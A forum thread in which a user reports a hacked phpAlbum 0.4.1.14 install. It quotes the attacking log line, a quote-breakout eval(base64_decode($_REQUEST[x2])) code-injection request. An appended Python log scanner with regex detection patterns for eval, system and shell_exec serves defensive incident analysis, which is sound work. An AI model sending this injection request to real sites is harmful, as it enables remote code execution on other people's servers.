My phpAlbum hacked

My phpAlbum version 0.4.1.14 was hacked. No idea if this particular bug has already been fixed.

This is the offending line in the logs:

GET /phpAlbum/main.php?cmd=setquality&var1=1%27.eval(base64_decode($_REQUEST[x2])).%27&x2=

I upgraded to 0.4.1.16, hope that fixes this hole.
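
A log check for requests shaped like the one above, added here as an example that is not part of the original post or of phpAlbum. It percent-decodes each query parameter, flags PHP call syntax inside a value, and reports any second parameter that the flagged value reads through a superglobal such as $_REQUEST. The log lines, addresses, the cmd=search request and the x2 value are constructed sample input.

```python
import base64
import re
from urllib.parse import parse_qsl, urlsplit

# PHP call syntax or superglobals that should never appear in a parameter value.
SUSPICIOUS = re.compile(
    r"\b(?:eval|assert|base64_decode|system|passthru|shell_exec)\s*\("
    r"|\$_(?:REQUEST|GET|POST|COOKIE)\b", re.IGNORECASE)
# A value that reads another request parameter, e.g. $_REQUEST[x2].
CARRIER_REF = re.compile(
    r"\$_(?:REQUEST|GET|POST|COOKIE)\[\s*['\"]?(\w+)['\"]?\s*\]", re.IGNORECASE)
REQUEST_LINE = re.compile(r"\b(?:GET|POST|HEAD) (\S+)")

def scan_line(line):
    """Return a finding for one access-log line, or None if nothing matches."""
    m = REQUEST_LINE.search(line)
    if not m:
        return None
    # parse_qsl percent-decodes, so %27 is already ' when the patterns run.
    params = parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True)
    hits = [(k, v) for k, v in params if SUSPICIOUS.search(v)]
    if not hits:
        return None
    referenced = {name for _, v in hits for name in CARRIER_REF.findall(v)}
    return {
        "injected_params": sorted({k for k, _ in hits}),
        "quote_breakout": any("'" in v or '"' in v for _, v in hits),
        "carrier_params": sorted(referenced & {k for k, _ in params}),
    }

def scan_log(lines):
    """Return (line_number, finding) for every flagged line, 1-based."""
    found = ((n, scan_line(l)) for n, l in enumerate(lines, 1))
    return [(n, f) for n, f in found if f]

# Constructed sample input: documentation addresses and an inert x2 value.
_X2 = base64.b64encode(b"constructed sample, not a real payload").decode()
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2011:10:00:00 +0000] '
    '"GET /phpAlbum/main.php?cmd=setquality&var1=80 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2011:10:00:05 +0000] '
    '"GET /phpAlbum/main.php?cmd=setquality&var1=1%27.eval(base64_decode'
    '($_REQUEST[x2])).%27&x2=' + _X2 + ' HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2011:10:00:09 +0000] '
    '"GET /phpAlbum/main.php?cmd=search&var1=evaluate+results HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))
```

The carrier parameter named in a finding is where the encoded body travelled, so that value in the raw log line is the one to preserve for analysis.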

thank you very much for posting the link .. will try to fix this if not already done ...

any follow-ups about this?
